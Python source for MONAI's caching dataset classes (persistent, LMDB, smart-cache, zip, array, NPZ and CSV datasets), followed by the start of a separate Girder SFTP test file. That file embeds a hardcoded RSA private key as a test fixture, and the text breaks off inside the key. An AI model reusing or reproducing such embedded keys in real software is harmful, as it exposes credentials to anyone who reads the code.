try:
# NOTE: Writing to a temporary directory and then using a nearly atomic rename operation
# to make the cache more robust to manual killing of parent process
# which may leave partially written cache files in an incomplete state
with tempfile.TemporaryDirectory() as tmpdirname:
temp_hash_file = Path(tmpdirname) / hashfile.name
torch.save(
obj=_item_transformed,
f=temp_hash_file,
pickle_module=look_up_option(self.pickle_module, SUPPORTED_PICKLE_MOD),
pickle_protocol=self.pickle_protocol,
)
if temp_hash_file.is_file() and not hashfile.is_file():
# On Unix, if target exists and is a file, it will be replaced silently if the user has permission.
# for more details: https://docs.python.org/3/library/shutil.html#shutil.move.
try:
shutil.move(temp_hash_file, hashfile)
except FileExistsError:
pass
except PermissionError: # project-monai/monai issue #3613
pass
return _item_transformed
def _transform(self, index: int):
pre_random_item = self._cachecheck(self.data[index])
return self._post_transform(pre_random_item)
class CacheNTransDataset(PersistentDataset):
"""
Extension of `PersistentDataset`, tt can also cache the result of first N transforms, no matter it's random or not.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_n_trans: int,
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
pickle_module: str = "pickle",
pickle_protocol: int = DEFAULT_PROTOCOL,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`PersistentDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_n_trans: cache the result of first N transforms.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
pickle_module: string representing the module used for pickling metadata and objects,
default to `"pickle"`. due to the pickle limitation in multi-processing of Dataloader,
we can't use `pickle` as arg directly, so here we use a string name instead.
if want to use other pickle module at runtime, just register like:
>>> from monai.data import utils
>>> utils.SUPPORTED_PICKLE_MOD["test"] = other_pickle
this arg is used by `torch.save`, for more details, please check:
https://pytorch.org/docs/stable/generated/torch.save.html#torch.save,
and ``monai.data.utils.SUPPORTED_PICKLE_MOD``.
pickle_protocol: can be specified to override the default protocol, default to `2`.
this arg is used by `torch.save`, for more details, please check:
https://pytorch.org/docs/stable/generated/torch.save.html#torch.save.
"""
super().__init__(
data=data,
transform=transform,
cache_dir=cache_dir,
hash_func=hash_func,
pickle_module=pickle_module,
pickle_protocol=pickle_protocol,
)
self.cache_n_trans = cache_n_trans
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the N element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the N transform object
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i == self.cache_n_trans:
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the N + 1 transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first N transform)
Returns:
the final transformed result
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i >= self.cache_n_trans:
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
class LMDBDataset(PersistentDataset):
"""
Extension of `PersistentDataset` using LMDB as the backend.
See Also:
:py:class:`monai.data.PersistentDataset`
Examples:
>>> items = [{"data": i} for i in range(5)]
# [{'data': 0}, {'data': 1}, {'data': 2}, {'data': 3}, {'data': 4}]
>>> lmdb_ds = monai.data.LMDBDataset(items, transform=monai.transforms.SimulateDelayd("data", delay_time=1))
>>> print(list(lmdb_ds)) # using the cached results
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Union[Path, str] = "cache",
hash_func: Callable[..., bytes] = pickle_hashing,
db_name: str = "monai_cache",
progress: bool = True,
pickle_protocol=pickle.HIGHEST_PROTOCOL,
lmdb_kwargs: Optional[dict] = None,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`LMDBDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: if specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If the cache_dir doesn't exist, will automatically create it. Defaults to "./cache".
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
db_name: lmdb database file name. Defaults to "monai_cache".
progress: whether to display a progress bar.
pickle_protocol: pickle protocol version. Defaults to pickle.HIGHEST_PROTOCOL.
https://docs.python.org/3/library/pickle.html#pickle-protocols
lmdb_kwargs: additional keyword arguments to the lmdb environment.
for more details please visit: https://lmdb.readthedocs.io/en/release/#environment-class
"""
super().__init__(
data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func, pickle_protocol=pickle_protocol
)
self.progress = progress
if not self.cache_dir:
raise ValueError("cache_dir must be specified.")
self.db_file = self.cache_dir / f"{db_name}.lmdb"
self.lmdb_kwargs = lmdb_kwargs or {}
if not self.lmdb_kwargs.get("map_size", 0):
self.lmdb_kwargs["map_size"] = 1024 ** 4 # default map_size
# lmdb is single-writer multi-reader by default
# the cache is created without multi-threading
self._read_env = None
# this runs on the primary thread/process
self._fill_cache_start_reader(show_progress=self.progress)
print(f"Accessing lmdb file: {self.db_file.absolute()}.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
super().set_data(data=data)
self._read_env = self._fill_cache_start_reader(show_progress=self.progress)
def _fill_cache_start_reader(self, show_progress=True):
"""
Check the LMDB cache and write the cache if needed. py-lmdb doesn't have a good support for concurrent write.
This method can be used with multiple processes, but it may have a negative impact on the performance.
Args:
show_progress: whether to show the progress bar if possible.
"""
# create cache
self.lmdb_kwargs["readonly"] = False
env = lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
if show_progress and not has_tqdm:
warnings.warn("LMDBDataset: tqdm is not installed. not displaying the caching progress.")
with env.begin(write=False) as search_txn:
for item in tqdm(self.data) if has_tqdm and show_progress else self.data:
key = self.hash_func(item)
done, retry, val = False, 5, None
while not done and retry > 0:
try:
with search_txn.cursor() as cursor:
done = cursor.set_key(key)
if done:
continue
if val is None:
val = self._pre_transform(deepcopy(item)) # keep the original hashed
val = pickle.dumps(val, protocol=self.pickle_protocol)
with env.begin(write=True) as txn:
txn.put(key, val)
done = True
except lmdb.MapFullError:
done, retry = False, retry - 1
size = env.info()["map_size"]
new_size = size * 2
warnings.warn(
f"Resizing the cache database from {int(size) >> 20}MB" f" to {int(new_size) >> 20}MB."
)
env.set_mapsize(new_size)
except lmdb.MapResizedError:
# the mapsize is increased by another process
# set_mapsize with a size of 0 to adopt the new size
env.set_mapsize(0)
if not done: # still has the map full error
size = env.info()["map_size"]
env.close()
raise ValueError(f"LMDB map size reached, increase size above current size of {size}.")
size = env.info()["map_size"]
env.close()
# read-only database env
self.lmdb_kwargs["readonly"] = True
self.lmdb_kwargs["map_size"] = size
if self.lmdb_kwargs.get("lock", None) is None:
self.lmdb_kwargs["lock"] = False
if self.lmdb_kwargs.get("readahead", None) is None:
self.lmdb_kwargs["readahead"] = False
return lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
def _cachecheck(self, item_transformed):
"""
if the item is not found in the lmdb file, resolves to the persistent cache default behaviour.
"""
if self._read_env is None:
# this runs on multiple processes, each one should have its own env.
self._read_env = self._fill_cache_start_reader(show_progress=False)
with self._read_env.begin(write=False) as txn:
data = txn.get(self.hash_func(item_transformed))
if data is None:
warnings.warn("LMDBDataset: cache key not found, running fallback caching.")
return super()._cachecheck(item_transformed)
try:
return pickle.loads(data)
except Exception as err:
raise RuntimeError("Invalid cache value, corrupted lmdb file?") from err
def info(self):
"""
Returns: dataset info dictionary.
"""
if self._read_env is None:
self._read_env = self._fill_cache_start_reader()
out = dict(self._read_env.info())
out["size"] = len(self.data)
out["filename"] = f"{self.db_file.absolute()}"
return out
class CacheDataset(Dataset):
"""
Dataset with cache mechanism that can load data and cache deterministic transforms' result during training.
By caching the results of non-random preprocessing transforms, it accelerates the training data pipeline.
If the requested data is not in the cache, all transforms will run normally
(see also :py:class:`monai.data.dataset.Dataset`).
Users can set the cache rate or number of items to cache.
It is recommended to experiment with different `cache_num` or `cache_rate` to identify the best training speed.
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
So to improve the caching efficiency, please always put as many as possible non-random transforms
before the randomized ones when composing the chain of transforms.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if the transform is a `Compose` of::
transforms = Compose([
LoadImaged(),
AddChanneld(),
Spacingd(),
Orientationd(),
ScaleIntensityRanged(),
RandCropByPosNegLabeld(),
ToTensord()
])
when `transforms` is used in a multi-epoch training pipeline, before the first training epoch,
this dataset will cache the results up to ``ScaleIntensityRanged``, as
all non-random transforms `LoadImaged`, `AddChanneld`, `Spacingd`, `Orientationd`, `ScaleIntensityRanged`
can be cached. During training, the dataset will load the cached results and run
``RandCropByPosNegLabeld`` and ``ToTensord``, as ``RandCropByPosNegLabeld`` is a randomized transform
and the outcome not cached.
During training call `set_data()` to update input data and recompute cache content, note that it requires
`persistent_workers=False` in the PyTorch DataLoader.
Note:
`CacheDataset` executes non-random transforms and prepares cache content in the main process before
the first epoch, then all the subprocesses of DataLoader will read the same cache content in the main process
during training. it may take a long time to prepare cache content according to the size of expected cache data.
So to debug or verify the program before real training, users can set `cache_rate=0.0` or `cache_num=0` to
temporarily skip caching.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_workers: Optional[int] = None,
progress: bool = True,
copy_cache: bool = True,
as_contiguous: bool = True,
) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_workers: the number of worker processes to use.
If num_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar.
copy_cache: whether to `deepcopy` the cache content before applying the random transforms,
default to `True`. if the random transforms don't modify the cached content
(for example, randomly crop from the cached image and deepcopy the crop region)
or if every cache item is only used once in a `multi-processing` environment,
may set `copy=False` for better performance.
as_contiguous: whether to convert the cached NumPy array or PyTorch tensor to be contiguous.
it may help improve the performance of following logic.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.progress = progress
self.copy_cache = copy_cache
self.as_contiguous = as_contiguous
self.cache_num = min(int(cache_num), int(len(data) * cache_rate), len(data))
self.num_workers = num_workers
if self.num_workers is not None:
self.num_workers = max(int(self.num_workers), 1)
self._cache: List = self._fill_cache()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
Note: should call this func after an entire epoch and must set `persistent_workers=False`
in PyTorch DataLoader, because it needs to create new worker processes based on new
generated cache content.
"""
self.data = data
self._cache = self._fill_cache()
def _fill_cache(self) -> List:
if self.cache_num <= 0:
return []
if self.progress and not has_tqdm:
warnings.warn("tqdm is not installed, will not show the caching progress bar.")
with ThreadPool(self.num_workers) as p:
if self.progress and has_tqdm:
return list(
tqdm(
p.imap(self._load_cache_item, range(self.cache_num)),
total=self.cache_num,
desc="Loading dataset",
)
)
return list(p.imap(self._load_cache_item, range(self.cache_num)))
def _load_cache_item(self, idx: int):
"""
Args:
idx: the index of the input data sequence.
"""
item = self.data[idx]
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item = apply_transform(_xform, item)
if self.as_contiguous:
item = convert_to_contiguous(item, memory_format=torch.contiguous_format)
return item
def _transform(self, index: int):
if index % len(self) >= self.cache_num: # support negative index
# no cache for this index, execute all the transforms directly
return super()._transform(index)
# load data from cache and execute from the first random transform
start_run = False
if self._cache is None:
self._cache = self._fill_cache()
data = self._cache[index]
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for _transform in self.transform.transforms:
if start_run or isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
# only need to deep copy data on first non-deterministic transform
if not start_run:
start_run = True
if self.copy_cache:
data = deepcopy(data)
data = apply_transform(_transform, data)
return data
class SmartCacheDataset(Randomizable, CacheDataset):
"""
Re-implementation of the SmartCache mechanism in NVIDIA Clara-train SDK.
At any time, the cache pool only keeps a subset of the whole dataset. In each epoch, only the items
in the cache are used for training. This ensures that data needed for training is readily available,
keeping GPU resources busy. Note that cached items may still have to go through a non-deterministic
transform sequence before being fed to GPU. At the same time, another thread is preparing replacement
items by applying the transform sequence to items not in cache. Once one epoch is completed, Smart
Cache replaces the same number of items with replacement items.
Smart Cache uses a simple `running window` algorithm to determine the cache content and replacement items.
Let N be the configured number of objects in cache; and R be the number of replacement objects (R = ceil(N * r),
where r is the configured replace rate).
For more details, please refer to:
https://docs.nvidia.com/clara/tlt-mi/clara-train-sdk-v3.0/nvmidl/additional_features/smart_cache.html#smart-cache
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if we have 5 images: `[image1, image2, image3, image4, image5]`, and `cache_num=4`, `replace_rate=0.25`.
so the actual training images cached and replaced for every epoch are as below::
epoch 1: [image1, image2, image3, image4]
epoch 2: [image2, image3, image4, image5]
epoch 3: [image3, image4, image5, image1]
epoch 3: [image4, image5, image1, image2]
epoch N: [image[N % 5] ...]
The usage of `SmartCacheDataset` contains 4 steps:
1. Initialize `SmartCacheDataset` object and cache for the first epoch.
2. Call `start()` to run replacement thread in background.
3. Call `update_cache()` before every epoch to replace training items.
4. Call `shutdown()` when training ends.
During training call `set_data()` to update input data and recompute cache content, note to call
`shutdown()` to stop first, then update data and call `start()` to restart.
Note:
This replacement will not work for below cases:
1. Set the `multiprocessing_context` of DataLoader to `spawn`.
2. Run on windows(the default multiprocessing method is `spawn`) with `num_workers` greater than 0.
3. Set the `persistent_workers` of DataLoader to `True` with `num_workers` greater than 0.
If using MONAI workflows, please add `SmartCacheHandler` to the handler list of trainer,
otherwise, please make sure to call `start()`, `update_cache()`, `shutdown()` during training.
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
replace_rate: percentage of the cached items to be replaced in every epoch.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_init_workers: the number of worker threads to initialize the cache for first epoch.
If num_init_workers is None then the number returned by os.cpu_count() is used.
num_replace_workers: the number of worker threads to prepare the replacement cache for every epoch.
If num_replace_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar when caching for the first epoch.
shuffle: whether to shuffle the whole data list before preparing the cache content for first epoch.
it will not modify the original input data sequence in-place.
seed: random seed if shuffle is `True`, default to `0`.
copy_cache: whether to `deepcopy` the cache content before applying the random transforms,
default to `True`. if the random transforms don't modify the cache content
or every cache item is only used once in a `multi-processing` environment,
may set `copy=False` for better performance.
as_contiguous: whether to convert the cached NumPy array or PyTorch tensor to be contiguous.
it may help improve the performance of following logic.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
replace_rate: float,
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_init_workers: Optional[int] = None,
num_replace_workers: Optional[int] = None,
progress: bool = True,
shuffle: bool = True,
seed: int = 0,
copy_cache: bool = True,
as_contiguous: bool = True,
) -> None:
if shuffle:
self.set_random_state(seed=seed)
data = copy(data)
self.randomize(data)
self.shuffle = shuffle
super().__init__(data, transform, cache_num, cache_rate, num_init_workers, progress, copy_cache, as_contiguous)
if self._cache is None:
self._cache = self._fill_cache()
if self.cache_num >= len(data):
warnings.warn(
"cache_num is greater or equal than dataset length, fall back to regular monai.data.CacheDataset."
)
if replace_rate <= 0:
raise ValueError("replace_rate must be greater than 0, otherwise, please use monai.data.CacheDataset.")
self.num_replace_workers: Optional[int] = num_replace_workers
if self.num_replace_workers is not None:
self.num_replace_workers = max(int(self.num_replace_workers), 1)
self._total_num: int = len(data)
self._replace_num: int = min(math.ceil(self.cache_num * replace_rate), len(data) - self.cache_num)
self._replacements: List[Any] = [None for _ in range(self._replace_num)]
self._replace_data_idx: List[int] = list(range(self._replace_num))
self._start_pos: int = 0
self._update_lock: threading.Lock = threading.Lock()
self._round: int = 1
self._replace_done: bool = False
self._replace_mgr: Optional[threading.Thread] = None
self._compute_data_idx()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
Note: should call `shutdown()` before calling this func.
"""
if self.is_started():
warnings.warn("SmartCacheDataset is not shutdown yet, shutdown it directly.")
self.shutdown()
if self.shuffle:
data = copy(data)
self.randomize(data)
super().set_data(data)
def randomize(self, data: Sequence) -> None:
try:
self.R.shuffle(data)
except TypeError as e:
warnings.warn(f"input data can't be shuffled in SmartCacheDataset with numpy.random.shuffle(): {e}.")
def _compute_data_idx(self):
"""
Update the replacement data position in the total data.
"""
for i in range(self._replace_num):
pos: int = self._start_pos + self.cache_num + i
if pos >= self._total_num:
pos -= self._total_num
self._replace_data_idx[i] = pos
def is_started(self):
"""
Check whether the replacement thread is already started.
"""
if self._replace_mgr is None:
return False
return self._replace_mgr.is_alive()
def start(self):
"""
Start the background thread to replace training items for every epoch.
"""
if self._replace_mgr is None or not self.is_started():
self._restart()
def _restart(self):
"""
Restart background thread if killed for some reason.
"""
self._round = 1
self._replace_mgr = threading.Thread(target=self.manage_replacement, daemon=True)
self._replace_mgr.start()
def _try_update_cache(self):
"""
Update the cache items with new replacement for current epoch.
"""
with self._update_lock:
if not self._replace_done:
return False
del self._cache[: self._replace_num]
self._cache.extend(self._replacements)
self._start_pos += self._replace_num
if self._start_pos >= self._total_num:
self._start_pos -= self._total_num
self._compute_data_idx()
# ready for next round
self._round += 1
self._replace_done = False
return True
def update_cache(self):
"""
Update cache items for current epoch, need to call this function before every epoch.
If the cache has been shutdown before, need to restart the `_replace_mgr` thread.
"""
if not self._replace_mgr.is_alive():
self._restart()
# make sure update is done
while not self._try_update_cache():
time.sleep(0.01)
def _try_shutdown(self):
"""
Wait for thread lock to shut down the background thread.
"""
with self._update_lock:
if self._replace_done:
self._round = 0
self._start_pos = 0
self._compute_data_idx()
self._replace_done = False
return True
return False
def shutdown(self):
"""
Shut down the background thread for replacement.
"""
if not self.is_started():
return
# wait until replace mgr is done the current round
while not self._try_shutdown():
time.sleep(0.01)
self._replace_mgr.join()
def _replace_cache_thread(self, index: int):
"""
Execute deterministic transforms on the new data for replacement.
"""
pos: int = self._replace_data_idx[index]
self._replacements[index] = self._load_cache_item(pos)
def _compute_replacements(self):
"""
Compute expected items for the replacement of next epoch, execute deterministic transforms.
It can support multi-threads to accelerate the computation progress.
"""
with ThreadPool(self.num_replace_workers) as p:
p.map(self._replace_cache_thread, list(range(self._replace_num)))
self._replace_done = True
def _try_manage_replacement(self, check_round):
"""
Wait thread lock and replace training items in the background thread.
"""
with self._update_lock:
if self._round <= 0:
# shutdown replacement
self._replace_done = True
return True, -1
if self._round != check_round:
self._compute_replacements()
return False, self._round
def manage_replacement(self):
"""
Background thread for replacement.
"""
check_round: int = -1
done = False
while not done:
done, check_round = self._try_manage_replacement(check_round)
time.sleep(0.01)
def __len__(self):
"""
The dataset length is given by cache_num instead of len(data).
"""
return self.cache_num
class ZipDataset(Dataset):
"""
Zip several PyTorch datasets and output data(with the same index) together in a tuple.
If the output of single dataset is already a tuple, flatten it and extend to the result.
For example: if datasetA returns (img, imgmeta), datasetB returns (seg, segmeta),
finally return (img, imgmeta, seg, segmeta).
And if the datasets don't have same length, use the minimum length of them as the length
of ZipDataset.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Examples::
>>> zip_data = ZipDataset([[1, 2, 3], [4, 5]])
>>> print(len(zip_data))
2
>>> for item in zip_data:
>>> print(item)
[1, 4]
[2, 5]
"""
def __init__(self, datasets: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
datasets: list of datasets to zip together.
transform: a callable data transform operates on the zipped item from `datasets`.
"""
super().__init__(list(datasets), transform=transform)
def __len__(self) -> int:
return min(len(dataset) for dataset in self.data)
def _transform(self, index: int):
def to_list(x):
return list(x) if isinstance(x, (tuple, list)) else [x]
data = []
for dataset in self.data:
data.extend(to_list(dataset[index]))
if self.transform is not None:
data = apply_transform(self.transform, data, map_items=False) # transform the list data
# use tuple instead of list as the default collate_fn callback of MONAI DataLoader flattens nested lists
return tuple(data)
class ArrayDataset(Randomizable, _TorchDataset):
"""
Dataset for segmentation and classification tasks based on array format input data and transforms.
It ensures the same random seeds in the randomized transforms defined for image, segmentation and label.
The `transform` can be :py:class:`monai.transforms.Compose` or any other callable object.
For example:
If train based on Nifti format images without metadata, all transforms can be composed::
img_transform = Compose(
[
LoadImage(image_only=True),
AddChannel(),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
If training based on images and the metadata, the array transforms can not be composed
because several transforms receives multiple parameters or return multiple values. Then Users need
to define their own callable method to parse metadata from `LoadImage` or set `affine` matrix
to `Spacing` transform::
class TestCompose(Compose):
def __call__(self, input_):
img, metadata = self.transforms[0](input_)
img = self.transforms[1](img)
img, _, _ = self.transforms[2](img, metadata["affine"])
return self.transforms[3](img), metadata
img_transform = TestCompose(
[
LoadImage(image_only=False),
AddChannel(),
Spacing(pixdim=(1.5, 1.5, 3.0)),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
Examples::
>>> ds = ArrayDataset([1, 2, 3, 4], lambda x: x + 0.1)
>>> print(ds[0])
1.1
>>> ds = ArrayDataset(img=[1, 2, 3, 4], seg=[5, 6, 7, 8])
>>> print(ds[0])
[1, 5]
"""
def __init__(
self,
img: Sequence,
img_transform: Optional[Callable] = None,
seg: Optional[Sequence] = None,
seg_transform: Optional[Callable] = None,
labels: Optional[Sequence] = None,
label_transform: Optional[Callable] = None,
) -> None:
"""
Initializes the dataset with the filename lists. The transform `img_transform` is applied
to the images and `seg_transform` to the segmentations.
Args:
img: sequence of images.
img_transform: transform to apply to each element in `img`.
seg: sequence of segmentations.
seg_transform: transform to apply to each element in `seg`.
labels: sequence of labels.
label_transform: transform to apply to each element in `labels`.
"""
items = [(img, img_transform), (seg, seg_transform), (labels, label_transform)]
self.set_random_state(seed=get_seed())
datasets = [Dataset(x[0], x[1]) for x in items if x[0] is not None]
self.dataset = datasets[0] if len(datasets) == 1 else ZipDataset(datasets)
self._seed = 0 # transform synchronization seed
def __len__(self) -> int:
return len(self.dataset)
def randomize(self, data: Optional[Any] = None) -> None:
self._seed = self.R.randint(MAX_SEED, dtype="uint32")
def __getitem__(self, index: int):
self.randomize()
if isinstance(self.dataset, ZipDataset):
# set transforms of each zip component
for dataset in self.dataset.data:
transform = getattr(dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
transform = getattr(self.dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
return self.dataset[index]
class NPZDictItemDataset(Dataset):
"""
Represents a dataset from a loaded NPZ file. The members of the file to load are named in the keys of `keys` and
stored under the keyed name. All loaded arrays must have the same 0-dimension (batch) size. Items are always dicts
mapping names to an item extracted from the loaded arrays.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Args:
npzfile: Path to .npz file or stream containing .npz file data
keys: Maps keys to load from file to name to store in dataset
transform: Transform to apply to batch dict
other_keys: secondary data to load from file and store in dict `other_keys`, not returned by __getitem__
"""
def __init__(
self,
npzfile: Union[str, IO],
keys: Dict[str, str],
transform: Optional[Callable[..., Dict[str, Any]]] = None,
other_keys: Optional[Sequence[str]] = (),
):
self.npzfile: Union[str, IO] = npzfile if isinstance(npzfile, str) else "STREAM"
self.keys: Dict[str, str] = dict(keys)
dat = np.load(npzfile)
self.arrays = {storedk: dat[datak] for datak, storedk in self.keys.items()}
self.length = self.arrays[first(self.keys.values())].shape[0]
self.other_keys = {} if other_keys is None else {k: dat[k] for k in other_keys}
for k, v in self.arrays.items():
if v.shape[0] != self.length:
raise ValueError(
"All loaded arrays must have the same first dimension "
f"size {self.length}, array `{k}` has size {v.shape[0]}"
)
super().__init__([], transform)
def __len__(self):
return self.length
def _transform(self, index: int):
data = {k: v[index] for k, v in self.arrays.items()}
if not self.transform:
return data
result = apply_transform(self.transform, data)
if isinstance(result, dict) or (isinstance(result, list) and isinstance(result[0], dict)):
return result
raise AssertionError("With a dict supplied to apply_transform, should return a dict or a list of dicts.")
class CSVDataset(Dataset):
"""
Dataset to load data from CSV files and generate a list of dictionaries,
every dictionary maps to a row of the CSV file, and the keys of dictionary
map to the column names of the CSV file.
It can load multiple CSV files and join the tables with additional `kwargs` arg.
Support to only load specific rows and columns.
And it can also group several loaded columns to generate a new column, for example,
set `col_groups={"meta": ["meta_0", "meta_1", "meta_2"]}`, output can be::
[
{"image": "./image0.nii", "meta_0": 11, "meta_1": 12, "meta_2": 13, "meta": [11, 12, 13]},
{"image": "./image1.nii", "meta_0": 21, "meta_1": 22, "meta_2": 23, "meta": [21, 22, 23]},
]
Args:
src: if provided the filename of CSV file, it can be a str, URL, path object or file-like object to load.
also support to provide pandas `DataFrame` directly, will skip loading from filename.
if provided a list of filenames or pandas `DataFrame`, it will join the tables.
row_indices: indices of the expected rows to load. it should be a list,
every item can be a int number or a range `[start, end)` for the indices.
for example: `row_indices=[[0, 100], 200, 201, 202, 300]`. if None,
load all the rows in the file.
col_names: names of the expected columns to load. if None, load all the columns.
col_types: `type` and `default value` to convert the loaded columns, if None, use original data.
it should be a dictionary, every item maps to an expected column, the `key` is the column
name and the `value` is None or a dictionary to define the default value and data type.
the supported keys in dictionary are: ["type", "default"]. for example::
col_types = {
"subject_id": {"type": str},
"label": {"type": int, "default": 0},
"ehr_0": {"type": float, "default": 0.0},
"ehr_1": {"type": float, "default": 0.0},
"image": {"type": str, "default": None},
}
col_groups: args to group the loaded columns to generate a new column,
it should be a dictionary, every item maps to a group, the `key` will
be the new column name, the `value` is the names of columns to combine. for example:
`col_groups={"ehr": [f"ehr_{i}" for i in range(10)], "meta": ["meta_1", "meta_2"]}`
transform: transform to apply on the loaded items of a dictionary data.
kwargs: additional arguments for `pandas.merge()` API to join tables.
.. deprecated:: 0.8.0
``filename`` is deprecated, use ``src`` instead.
"""
@deprecated_arg(name="filename", new_name="src", since="0.8", msg_suffix="please use `src` instead.")
def __init__(
self,
src: Optional[Union[str, Sequence[str]]] = None, # also can be `DataFrame` or sequense of `DataFrame`
row_indices: Optional[Sequence[Union[int, str]]] = None,
col_names: Optional[Sequence[str]] = None,
col_types: Optional[Dict[str, Optional[Dict[str, Any]]]] = None,
col_groups: Optional[Dict[str, Sequence[str]]] = None,
transform: Optional[Callable] = None,
**kwargs,
):
srcs = (src,) if not isinstance(src, (tuple, list)) else src
dfs: List = []
for i in srcs:
if isinstance(i, str):
dfs.append(pd.read_csv(i))
elif isinstance(i, pd.DataFrame):
dfs.append(i)
else:
raise ValueError("`src` must be file path or pandas `DataFrame`.")
# in case treating deprecated arg `filename` as kwargs, remove it from `kwargs`
kwargs.pop("filename", None)
data = convert_tables_to_dicts(
dfs=dfs, row_indices=row_indices, col_names=col_names, col_types=col_types, col_groups=col_groups, **kwargs
)
super().__init__(data=data, transform=transform)
|
sftp_test.py
|
# -*- coding: utf-8 -*-
import paramiko
import six
import socket
import stat
import threading
from .. import base
from girder.api import sftp
from girder.models.collection import Collection
from girder.models.folder import Folder
from girder.models.upload import Upload
from girder.models.user import User
from six.moves import StringIO
server = None
TEST_PORT = 10551
TEST_KEY = paramiko.RSAKey.from_private_key(StringIO("""-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAwdH5tlaZu52adYvW57DcAFknzOKX8+/axDmQdTcg1HwEOnT2
TMSFGciwUQMmya+0i23ZOUtZQutj8fb66szrBZ7qpIvSG6TRyxGuM6PkfAUcBCHO
TGFzaJPnnvUXC8dlxoUIdBaUCmSblvj2q2CTNy53ybAmiiSpahjvBO16pvjbNn+i
EGucSQn71OTMhoSOWtS/VcJC6JPd6kxSdl1EiESbOrjAdNDKMBnfYCkxPG4ulAqe
y5jpfgQiUC0Q3CoWbj/ybAv73JsFndPcpvI8n5EsXeptuWI4CXSorYOuVwURLuzP
z1PkI4ZsYnSnuQG/GReAZnwVDaVJ/uhYMMs1sQIDAQABAoIBADKOmguFBW7aCntU
8cbX7Fsu5mHcTXS1ASSkO1lH+wlSHCw/bCvUKz/xiIRpRQnhCkBAdCQs0mjRS+3G
